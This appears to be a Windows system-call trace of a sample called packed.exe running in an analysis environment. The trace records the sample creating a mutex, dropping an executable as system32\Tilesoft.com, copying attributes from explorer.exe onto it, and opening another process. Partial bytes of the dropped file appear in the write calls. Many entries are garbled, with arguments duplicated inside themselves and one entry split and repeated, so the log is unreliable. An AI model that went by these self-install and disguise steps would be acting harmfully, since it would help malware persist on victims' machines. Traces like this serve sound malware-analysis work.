 02711   748   NtQueryValueKey  (336,  (336, "mixer", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "mixer", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02712   748   NtQueryValueKey  (336,  (336, "mixer1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "mixer1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02713   748   NtQueryValueKey  (336,  (336, "mixer1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (336, "mixer1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0
 02714   748   NtQueryValueKey  (336,  (336, "mixer2", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02715   748   NtQueryValueKey  (336,  (336, "mixer3", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02716   748   NtQueryValueKey  (336,  (336, "mixer4", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02717   748   NtQueryValueKey  (336,  (336, "mixer5", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02718   748   NtQueryValueKey  (336,  (336, "mixer6", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02719   748   NtQueryValueKey  (336,  (336, "mixer7", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02720   748   NtQueryValueKey  (336,  (336, "mixer8", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02721   748   NtQueryValueKey  (336,  (336, "mixer9", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02722   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSVFW32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02723   748   NtQueryDefaultLocale  (1, 1240392, ... ) == 0x0
 02724   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avicap32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02725   748   NtQueryDefaultLocale  (1, 1240396, ... ) == 0x0
 02726   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 02727   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 02728   748   NtAllocateVirtualMemory  (-1, 0, 0, 23, 4096, 64, ... 17367040, 4096, ) == 0x0
 02729   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 17432576, 4096, ) == 0x0
 02730   748   NtCreateMutant  (0x1f0001, {24, 48, 0x80, 0, 0,  (0x1f0001, {24, 48, 0x80, 0, 0, "ids443"}, 0, ... 340, ) }, 0, ... 340, ) == 0x0
 02731   748   NtAllocateVirtualMemory  (-1, 0, 0, 28, 4096, 64, ... 19726336, 4096, ) == 0x0
 02732   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 19791872, 4096, ) == 0x0
 02733   748   NtWaitForSingleObject  (340, 0, {-300000000, -1}, ... ) == 0x0
 02734   748   NtAllocateVirtualMemory  (-1, 0, 0, 44, 4096, 64, ... 19857408, 4096, ) == 0x0
 02735   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 19922944, 4096, ) == 0x0
 02736   748   NtAllocateVirtualMemory  (-1, 0, 0, 19, 4096, 64, ... 19988480, 4096, ) == 0x0
 02737   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 20054016, 4096, ) == 0x0
 02738   748   NtAllocateVirtualMemory  (-1, 0, 0, 55, 4096, 64, ... 20119552, 4096, ) == 0x0
 02739   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 20185088, 4096, ) == 0x0
 02740   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Tilesoft.com"}, 1242368, ... ) }, 1242368, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02741   748   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 1241256,  (0x80100080, {24, 0, 0x40, 0, 1241256, "\??\u:\work\packed.exe"}, 0x0, 0, 1, 1, 2097252, 0, 0, ... 344, {status=0x0, info=1}, ) }, 0x0, 0, 1, 1, 2097252, 0, 0, ... 344, {status=0x0, info=1}, ) == 0x0
 02742   748   NtQueryInformationFile  (344, 1241692, 8, AttributeFlag, ... {status=0x0, info=8}, ) == 0x0
 02743   748   NtQueryInformationFile  (344, 1241608, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 02744   748   NtQueryInformationFile  (344, 1241424, 40, Basic, ... {status=0x0, info=40}, ) == 0x0
 02745   748   NtAllocateVirtualMemory  (-1, 1400832, 0, 8192, 4096, 4, ... 1400832, 8192, ) == 0x0
 02746   748   NtQueryInformationFile  (344, 1400648, 4094, Stream, ... {status=0x0, info=38}, ) == 0x0
 02747   748   NtQueryInformationFile  (344, 1239872, 40, Basic, ... {status=0x0, info=40}, ) == 0x0
 02748   748   NtQueryInformationFile  (344, 1240148, 4, Ea, ... {status=0x0, info=4}, ) == 0x0
 02749   748   NtCreateFile  (0x40110080, {24, 0, 0x40, 0, 1240024,  (0x40110080, {24, 0, 0x40, 0, 1240024, "\??\C:\WINDOWS\system32\Tilesoft.com"}, 0x0, 32, 0, 5, 100, 0, 0, ... }, 0x0, 32, 0, 5, 100, 0, 0, ...
 02750   748   NtClose  (-2147482740, ... ) == 0x0
 02749   748   NtCreateFile  ... 348, {status=0x0, info=2}, ) == 0x0
 02751   748   NtQueryVolumeInformationFile  (348, 1240176, 536, Attribute, ... {status=0x0, info=20}, ) == 0x0
 02752   748   NtQueryInformationFile  (348, 1239760, 40, Basic, ... {status=0x0, info=40}, ) == 0x0
 02753   748   NtQueryVolumeInformationFile  (344, 1240176, 536, Attribute, ... {status=0x0, info=20}, ) == 0x0
 02754   748   NtQueryVolumeInformationFile  (344, 1239520, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 02755   748   NtSetInformationFile  (348, 1240076, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 02756   748   NtCreateSection  (0xf001f, 0x0, 0x0, 2, 134217728, 344, ... 352, ) == 0x0
 02757   748   NtMapViewOfSection  (352, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 2, ... (0x1350000), {0, 0}, 217088, ) == 0x0
 02758   748   NtClose  (352, ... ) == 0x0
 02759   748   NtWriteFile  (348, 0, 0, 0,  (348, 0, 0, 0, "MZ\220\0\3\0\0\0\4\0\0\0\377\377\0\0\270\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\340\0\0\0\16\37\272\16\0\264\11\315!\270\1L\315!This program cannot be run in DOS mode.\15\15\12$\0\0\0\0\0\0\0\216H\214T\312)\342\7\312)\342\7\312)\342\7\312)\343\7\265)\342\7\2506\361\7\317)\342\7\2615\356\7\313)\342\7I5\354\7\322)\342\7"6\350\7\274)\342\7"6\351\7\213)\342\7Rich\312)\342\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0PE\0\0L\1\5\0\366\242\347F\0\0\0\0\0\0\0\0\340\0\17\1\13\1\6\0\0\364\1\0\0\230\4\0\0\0\0\0\0\20\0\0\0\20\0\0\0\20\2\0\0\0@\0\0\20\0\0\0\2\0\0\4\0\0\0\0\0\0\0\4\0\0\0\0\0\0\0\0`\10\0\0\4\0\09z\3\0\2\0\0\0\0\0\20\0\0\20\0\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0P\272\6\0\314\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\334\271\6\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\2\0\0\20\0\0\0\364\0\0\0\4\0\0\0\0\0\0", 61440, 0x0, 0, ... {status=0x0, info=61440}, ) 6\350\7\274)\342\7 (348, 0, 0, 0, "MZ\220\0\3\0\0\0\4\0\0\0\377\377\0\0\270\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\340\0\0\0\16\37\272\16\0\264\11\315!\270\1L\315!This program cannot be run in DOS mode.\15\15\12$\0\0\0\0\0\0\0\216H\214T\312)\342\7\312)\342\7\312)\342\7\312)\343\7\265)\342\7\2506\361\7\317)\342\7\2615\356\7\313)\342\7I5\354\7\322)\342\7"6\350\7\274)\342\7"6\351\7\213)\342\7Rich\312)\342\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0PE\0\0L\1\5\0\366\242\347F\0\0\0\0\0\0\0\0\340\0\17\1\13\1\6\0\0\364\1\0\0\230\4\0\0\0\0\0\0\20\0\0\0\20\0\0\0\20\2\0\0\0@\0\0\20\0\0\0\2\0\0\4\0\0\0\0\0\0\0\4\0\0\0\0\0\0\0\0`\10\0\0\4\0\09z\3\0\2\0\0\0\0\0\20\0\0\20\0\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0P\272\6\0\314\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\334\271\6\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\2\0\0\20\0\0\0\364\0\0\0\4\0\0\0\0\0\0", 61440, 0x0, 0, ... {status=0x0, info=61440}, ) , 61440, 0x0, 0, ... {status=0x0, info=61440}, ) == 0x0
 02760   748   NtWriteFile  (348, 0, 0, 0,  (348, 0, 0, 0, "\377=~\6-3w\374\271C\20pA\316\356\340\207\33\374\205\304\265c\327\242\206d.\332Q\16T\235\275\375\34\36\3042\373a\335\263\336\214\213\302\235\330\245b\227y\320\305Zo\332);k\232\37?\220\2719\3409*\277\266:KM\333\354\14\241\364\320\37\313\307\302\331\362\245[\350\257\212\260N\246_\57\20R\16\205\330\350\4\23*\331\263,\5`\205I\32N\353\347\356D\241]\26d?\251\211\22\204\264\372s\364\34\202j\23\354\321_\220\344\232vHZKLJ\213\13\263CIp*\227f\21Z\356>\11\242\254\251\277\4B\235\36'\276\324~\243>TX*{9R~A\242\370\311;\2\331\301\311\352\210\240\231\342:aL\13\307N\202\305}\234\376N\256t\236\342\330GH\230\305#Y\266x\31\355\351\23\212\257"\233\240\30\234\265\200W\242-\236\37\233>\213\24\25\24\363\256\241\365\265>\337\231\275\253\1\217\335\340\314\260\263\3210\365\3215\2663:j\275\336\34A\323S\222i\230\237\264M=\266\337\351|\366P\200V\321\353\364\276\212\361\246f\14\365\241\304\223\26\306\333\374f{\325\310\34\3334\314\305\206\15\327\10%\235\47\273\363\27kEs\324\257\202*\371\324\257/\224\222y[K\252V\317\233\377\220\313\211(\4\366X\252T9\317\212u\33c\220(\0\236L\17\37V\10\30T$\326)m\2210\30\233\1\256/%q\307\250\3346VbD\347\375\332\377<\265\303i\33\24\21\257Tsf\337\10\377{U\34n\220\214?\364\370m\321\234\375\37\224\271\2408\243U/PD\352r%}u~\232\11\325\322\247\257M\200U{\230dF\245\255\310\256\23\34\311\244Q\13\14x\262u0\35f\370p\356\332\265}\246\2707\372y\272\363\310]\33\332\344\211J\230\242'", 61440, 0x0, 0, ... {status=0x0, info=61440}, ) \233\240\30\234\265\200W\242-\236\37\233>\213\24\25\24\363\256\241\365\265>\337\231\275\253\1\217\335\340\314\260\263\3210\365\3215\2663:j\275\336\34A\323S\222i\230\237\264M=\266\337\351|\366P\200V\321\353\364\276\212\361\246f\14\365\241\304\223\26\306\333\374f{\325\310\34\3334\314\305\206\15\327\10%\235\47\273\363\27kEs\324\257\202*\371\324\257/\224\222y[K\252V\317\233\377\220\313\211(\4\366X\252T9\317\212u\33c\220(\0\236L\17\37V\10\30T$\326)m\2210\30\233\1\256/%q\307\250\3346VbD\347\375\332\377<\265\303i\33\24\21\257Tsf\337\10\377{U\34n\220\214?\364\370m\321\234\375\37\224\271\2408\243U/PD\352r%}u~\232\11\325\322\247\257M\200U{\230dF\245\255\310\256\23\34\311\244Q\13\14x\262u0\35f\370p\356\332\265}\246\2707\372y\272\363\310]\33\332\344\211J\230\242'", 61440, 0x0, 0, ... {status=0x0, info=61440}, ) == 0x0
 02761   748   NtWriteFile  (348, 0, 0, 0,  (348, 0, 0, 0, "\35\203\227\222\230\311[u\0\374\2553\6|H\215\273\37#\211WA\10\2475 \4a\25\370N\220\3\376\242T\234\305A\200BCD\7EFGHI\0JKLM\0NOPQ\12RST8U\306\1XYZabc\300de\3fghijk\200lmn\7opqrs\0tuvw\16xyz0\012345\34678\09+/= $L(\235\0[]{},;:p-\0_\*"'\11\12\15\0\221\340\304\344\252g\350\210s\4\17\225\332\377$^\305!\352\204\300\6'\213\354&\271\220\24\3\313 6\1\250\325p\374\17\346\25\265\200 \306`\351I\\0\233\11\236\205-s\234\374\0z\224\33dJ\21[k\374\226\0\237\354\214\334\26-\333\300\7\227\303!TK\221\4\302f\374\344Y\7\31\354\353\37\224p\274V\11\212\0R@|\\317\324q\25\03)9'\377\364\243K<\375\20\0y\5\37H\203\310\223\0@\360\266\316\245R2\202\0\364\325\214\331G\3f\306\0\26\360\21\237B!UQ\0\277J\222\342~l\341v\0\273i\25\7\353)\271A\0\12c0\334\6\350\203\253~\200\0V|\25\301\347\317i\370\0}\11\375\213b\205\345\7\16\270\202\217\13\301KF\5\355`=\360\0\352v\24\316\273\220\24\307h\364\312\0\23\32\301\357$\377\306\1\224\2556\3~n\372A\214\355\23+\260\241j\0m$l\12\177\224\357{\0Jh\25D\315H\6Kz8\0\213A\236Q\363\272\2/\7\317\32\222\351\2040\350\6\322\275\7\371O\354\247\302\220\337*\211E\0\2\231I\237\26Z\306\331\354#vk\0\210\302B/\3776\312\360\0\341p\2723\313i\371\324\0\\255@\242h`\330o\177b\3\3\265;\244Zm\250", 61440, 0x0, 0, ... {status=0x0, info=61440}, ) '\11\12\15\0\221\340\304\344\252g\350\210s\4\17\225\332\377$^\305!\352\204\300\6'\213\354&\271\220\24\3\313 6\1\250\325p\374\17\346\25\265\200 \306`\351I\\0\233\11\236\205-s\234\374\0z\224\33dJ\21[k\374\226\0\237\354\214\334\26-\333\300\7\227\303!TK\221\4\302f\374\344Y\7\31\354\353\37\224p\274V\11\212\0R@|\\317\324q\25\03)9'\377\364\243K<\375\20\0y\5\37H\203\310\223\0@\360\266\316\245R2\202\0\364\325\214\331G\3f\306\0\26\360\21\237B!UQ\0\277J\222\342~l\341v\0\273i\25\7\353)\271A\0\12c0\334\6\350\203\253~\200\0V|\25\301\347\317i\370\0}\11\375\213b\205\345\7\16\270\202\217\13\301KF\5\355`=\360\0\352v\24\316\273\220\24\307h\364\312\0\23\32\301\357$\377\306\1\224\2556\3~n\372A\214\355\23+\260\241j\0m$l\12\177\224\357{\0Jh\25D\315H\6Kz8\0\213A\236Q\363\272\2/\7\317\32\222\351\2040\350\6\322\275\7\371O\354\247\302\220\337*\211E\0\2\231I\237\26Z\306\331\354#vk\0\210\302B/\3776\312\360\0\341p\2723\313i\371\324\0\\255@\242h`\330o\177b\3\3\265;\244Zm\250", 61440, 0x0, 0, ... {status=0x0, info=61440}, ) == 0x0
 02762   748   NtWriteFile  (348, 0, 0, 0,  (348, 0, 0, 0, "\23\3\22\340\202I\350]\330\234z\230\372\254\16~\300Y\351\340\16\21:%_\0\372;M{\262\236-\7\345d\204p\344\214\265\21\37\234\253l\0$\366\2\223\30\302\0\206W\204\344\300\10\350\205\2203,]N>\0\317\263\17\267K\273\1P\242[\303\13L\313\335.9\244{\14\333\17T\367\361\11\34\222-\311\213A\200M\376q!(\37\2603\271\0\303\321\323\330L4.O9\254\0\243\3516\357\341\370\352\2\0\365\13\3751\321\377\332\207\7\202-'5L\340D\360I\237t\4\0v\240\302\227\267\13&\207\0\34\243\345\247\260\352\257\374\0\263\272"~\273T\277\236\13\307\265\213P\200\261\341K\363a\5\370\3.\11B\203a>\330#\204:;\302Q\203\0\37{\223w\206\1\230p^]\2544?`-\312\2\301\10\336.\17\6\300\22\12X\0\376t0J8\310\366D\0\225\221\370P+'\372\373\36\2446E@V:\350p\222\334\0t\251J\325_\314\340n\35\324\17\323@\16\201\350\261\354\341\3\360\21\225\4\212\231\360\342\365\300\16c2\217\234`\35\250\236\272\26\0\343\341&\367\223G\27\4\04c\302\370\327i\306\236\0|Z\11O7f\251\240\0\205\226\16\222PnI~\17\316$x.`\256\26\216\260\34\22\353\360B\0t\322fDk\2747&.\332\267\270\320\325\250\276K\0)\203\362=\262G\351\360P^\217\346\5s\311~p\332\207\235P\235Z\253\302>D\276\0\244\37\322\227\15I\370\13)\341 [\340\272\17\212,\206\317g\7\226\311\236\362$\256X\216t\276\0\306?\11\216\326\344*\23\0\3=\227\360`\2/>\0}\201p!?)l8\4;E&L\256\253\0\5\210\340\21\310\\1\3529/:f-v\200\206\247$\274\316\250", 32768, 0x0, 0, ... {status=0x0, info=32768}, ) ~\273T\277\236\13\307\265\213P\200\261\341K\363a\5\370\3.\11B\203a>\330#\204:;\302Q\203\0\37{\223w\206\1\230p^]\2544?`-\312\2\301\10\336.\17\6\300\22\12X\0\376t0J8\310\366D\0\225\221\370P+'\372\373\36\2446E@V:\350p\222\334\0t\251J\325_\314\340n\35\324\17\323@\16\201\350\261\354\341\3\360\21\225\4\212\231\360\342\365\300\16c2\217\234`\35\250\236\272\26\0\343\341&\367\223G\27\4\04c\302\370\327i\306\236\0|Z\11O7f\251\240\0\205\226\16\222PnI~\17\316$x.`\256\26\216\260\34\22\353\360B\0t\322fDk\2747&.\332\267\270\320\325\250\276K\0)\203\362=\262G\351\360P^\217\346\5s\311~p\332\207\235P\235Z\253\302>D\276\0\244\37\322\227\15I\370\13)\341 [\340\272\17\212,\206\317g\7\226\311\236\362$\256X\216t\276\0\306?\11\216\326\344*\23\0\3=\227\360`\2/>\0}\201p!?)l8\4;E&L\256\253\0\5\210\340\21\310\\1\3529/:f-v\200\206\247$\274\316\250", 32768, 0x0, 0, ... {status=0x0, info=32768}, ) == 0x0
 02763   748   NtUnmapViewOfSection  (-1, 0x1350000, ... ) == 0x0
 02764   748   NtSetInformationFile  (348, 1241424, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 02765   748   NtClose  (344, ... ) == 0x0
 02766   748   NtClose  (348, ... ) == 0x0
 02767   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\explorer.exe"}, 1241244, ... ) }, 1241244, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02768   748   NtQueryAttributesFile  ({24, 12, 0x40, 0, 0,  ({24, 12, 0x40, 0, 0, "explorer.exe"}, 1241244, ... ) }, 1241244, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02769   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\explorer.exe"}, 1241244, ... ) }, 1241244, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02770   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system\explorer.exe"}, 1241244, ... ) }, 1241244, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02771   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\explorer.exe"}, 1241244, ... ) }, 1241244, ... ) == 0x0
 02772   748   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 1242044,  (0x80100080, {24, 0, 0x40, 0, 1242044, "\??\C:\WINDOWS\explorer.exe"}, 0x0, 128, 1, 1, 96, 0, 0, ... 348, {status=0x0, info=1}, ) }, 0x0, 128, 1, 1, 96, 0, 0, ... 348, {status=0x0, info=1}, ) == 0x0
 02773   748   NtAllocateVirtualMemory  (-1, 0, 0, 29, 4096, 64, ... 20250624, 4096, ) == 0x0
 02774   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 20316160, 4096, ) == 0x0
 02775   748   NtQueryInformationFile  (348, 1242096, 40, Basic, ... {status=0x0, info=40}, ) == 0x0
 02776   748   NtClose  (348, ... ) == 0x0
 02777   748   NtCreateFile  (0x40100080, {24, 0, 0x40, 0, 1242044,  (0x40100080, {24, 0, 0x40, 0, 1242044, "\??\C:\WINDOWS\system32\Tilesoft.com"}, 0x0, 128, 2, 1, 96, 0, 0, ... 348, {status=0x0, info=1}, ) }, 0x0, 128, 2, 1, 96, 0, 0, ... 348, {status=0x0, info=1}, ) == 0x0
 02778   748   NtAllocateVirtualMemory  (-1, 0, 0, 29, 4096, 64, ... 20381696, 4096, ) == 0x0
 02779   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 20447232, 4096, ) == 0x0
 02780   748   NtSetInformationFile  (348, 1242096, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 02781   748   NtClose  (348, ... ) == 0x0
 02782   748   NtAllocateVirtualMemory  (-1, 0, 0, 23, 4096, 64, ... 20512768, 4096, ) == 0x0
 02783   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 20578304, 4096, ) == 0x0
 02784   748   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Tilesoft.com"}, 7, 2113568, ... 348, {status=0x0, info=1}, ) }, 7, 2113568, ... 348, {status=0x0, info=1}, ) == 0x0
 02785   748   NtSetInformationFile  (348, 1242344, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 02786   748   NtClose  (348, ... ) == 0x0
 02787   748   NtAllocateVirtualMemory  (-1, 0, 0, 17, 4096, 64, ... 20643840, 4096, ) == 0x0
 02788   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 20709376, 4096, ) == 0x0
 02789   748   NtAllocateVirtualMemory  (-1, 0, 0, 86, 4096, 64, ... 20774912, 4096, ) == 0x0
 02790   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 20840448, 4096, ) == 0x0
 02791   748   NtOpenProcess  (0x100000, {24, 0, 0x2, 0, 0, 0x0}, {484, 0}, ... 348, ) == 0x0
 02792   748   NtAllocateVirtualMemory  (-1, 0, 0, 54, 4096, 64, ... 20905984, 4096, ) == 0x0
 02793   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 20971520, 4096, ) == 0x0
 02794   748   NtQueryInformationJobObject  (0, BasicUIRestrictions, 4, ... ) == STATUS_ACCESS_DENIED
 02795   748   NtOpenFile  (0x1000a1, {24, 0, 0x40, 0, 0,  (0x1000a1, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Tilesoft.com"}, 5, 96, ... 344, {status=0x0, info=1}, ) }, 5, 96, ... 344, {status=0x0, info=1}, ) == 0x0
 02796   748   NtCreateSection  (0xf001f, 0x0, 0x0, 16, 16777216, 344, ... 352, ) == 0x0
 02797   748   NtQueryVolumeInformationFile  (344, 1238720, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 02798   748   NtWaitForSingleObject  (88, 0, {-1000000, -1}, ... ) == 0x0
 02799   748   NtReleaseMutant  (88, ... 0x0, ) == 0x0
 02800   748   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 0,  (0x80100080, {24, 0, 0x40, 0, 0, "\SystemRoot\AppPatch\sysmain.sdb"}, 0x0, 128, 1, 1, 96, 0, 0, ... 356, {status=0x0, info=1}, ) }, 0x0, 128, 1, 1, 96, 0, 0, ... 356, {status=0x0, info=1}, ) == 0x0
 02801   748   NtQueryInformationFile  (356, 1236976, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 02802   748   NtCreateSection  (0x4, 0x0, 0x0, 2, 134217728, 356, ... 360, ) == 0x0
 02803   748   NtMapViewOfSection  (360, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x1410000), 0x0, 1191936, ) == 0x0
 02804   748   NtQueryInformationFile  (356, 1237076, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 02805   748   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 0,  (0x80100080, {24, 0, 0x40, 0, 0, "\SystemRoot\AppPatch\systest.sdb"}, 0x0, 128, 1, 1, 96, 0, 0, ... ) }, 0x0, 128, 1, 1, 96, 0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02806   748   NtOpenKey  (0x101, {24, 0, 0x40, 0, 0,  (0x101, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\WPA\TabletPC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02807   748   NtOpenKey  (0x101, {24, 0, 0x40, 0, 0,  (0x101, {24, 0, 0x40, 0, 0, "\Registry\Machine\SYSTEM\WPA\MediaCenter"}, ... 364, ) }, ... 364, ) == 0x0
 02808   748   NtQueryValueKey  (364,  (364, "Installed", Partial, 256, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 256, ... TitleIdx=0, Type=4, Data= (364, "Installed", Partial, 256, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 02809   748   NtClose  (364, ... ) == 0x0
 02810   748   NtCreateFile  (0x120116, {24, 0, 0x40, 0, 0,  (0x120116, {24, 0, 0x40, 0, 0, "\Device\NamedPipe\ShimViewer"}, 0x0, 128, 0, 1, 0, 0, 0, ... ) }, 0x0, 128, 0, 1, 0, 0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02811   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\"}, 3, 16417, ... 364, {status=0x0, info=1}, ) }, 3, 16417, ... 364, {status=0x0, info=1}, ) == 0x0
 02812   748   NtQueryDirectoryFile  (364, 0, 0, 0, 1234672, 616, BothDirectory, 1,  (364, 0, 0, 0, 1234672, 616, BothDirectory, 1, "Tilesoft.com", 0, ... {status=0x0, info=118}, ) , 0, ... {status=0x0, info=118}, ) == 0x0
 02813   748   NtClose  (364, ... ) == 0x0
 02814   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 02815   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 02816   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Tilesoft.com"}, 1235048, ... ) }, 1235048, ... ) == 0x0
 02817   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 364, {status=0x0, info=1}, ) }, 3, 16417, ... 364, {status=0x0, info=1}, ) == 0x0
 02818   748   NtQueryDirectoryFile  (364, 0, 0, 0, 1234476, 616, BothDirectory, 1,  (364, 0, 0, 0, 1234476, 616, BothDirectory, 1, "WINDOWS", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0
 02819   748   NtClose  (364, ... ) == 0x0
 02820   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\"}, 3, 16417, ... 364, {status=0x0, info=1}, ) }, 3, 16417, ... 364, {status=0x0, info=1}, ) == 0x0
